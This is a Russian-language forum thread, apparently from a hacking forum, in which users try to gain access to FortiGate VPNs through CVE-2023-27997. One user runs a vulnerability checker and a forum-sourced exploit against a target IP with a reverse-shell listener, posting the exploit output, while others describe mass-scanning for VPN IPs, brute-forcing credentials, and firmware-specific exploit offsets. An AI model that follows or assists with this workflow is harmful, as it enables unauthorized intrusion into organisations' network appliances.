Получение доступов с помощью CVE-2023-27997 fortigate?

[RedTeam]

Всех приветствую. Решил с этой старухой разобраться в исследовательских целях (просто ради опыта и набива руки).

Установил данную хуевину, чтобы проверить таргет на уязвимость: https://github.com/BishopFox/CVE-2023-27997-check

python3 CVE-2023-27997-check.py ip 10443
Checking ip:10443
WARNING: Low confidence results.
Vulnerable

$ python3 CVE-2023-27997-check.py ip 10443
Checking ip:10443
WARNING: Low confidence results.
Patched

Я заранее знал что он уязвим к RCE. Сначала показало Vulnerable, а затем patched[.] Странно... И к тому же как-то долго проверяло.

на xss.pro искал poc, особо никто ничего не пишет про нее. Я понял лишь что эта уязвимость связана с переполнением буфера. Далее я решил с гите поискать публичные эксплоиты, определяет уязвимость, но reverse shell не прилетает...

 

[RedTeam]

Взял эксп у weaver

https://xss.pro/threads/90485/page-2#post-768654 вот тут был
python3 exploit.py ip:10443 127.0.0.1:31337
[*] Got salt: 285ce3ad
[+] Overwrote SSL structure
[*] Attack socket is sane
[*] Triggering exploit
[*] Target socket is sane
[*] Attack socket is sane
[+] You (might) have a shell

не прилетает шелл. Ой, я еблан=)))) у меня нет белого айпи

p/s на сервак тоже шелл не прилетает.

 

[narow71]

Я кстати тоже пробовал, но не получилось. Мне кажется тебе лучше брутить их. Ты же кодер =)

 

[RedTeam]

Я кстати тоже пробовал, но не получилось. Мне кажется тебе лучше брутить их. Ты же кодер =)

Это да, но можно особо без вложений их добывать с помощью RCE

 

[narow71]

Это да, но можно особо без вложений их добывать с помощью RCE

Я раньше тоже пытался добывать с помощью разных cve. Брал масскан, получал ипы впнов. Но как только дело доходило до exploitа, то всегда возникали проблемы

 

[furi]

это не самый стабильный сплойт, почти каждое мажорное обновление ломает адреса. адреса нужны для ARM версии (только на железке,или дай бог заведется со скрипом на qemu), не 86 вм образы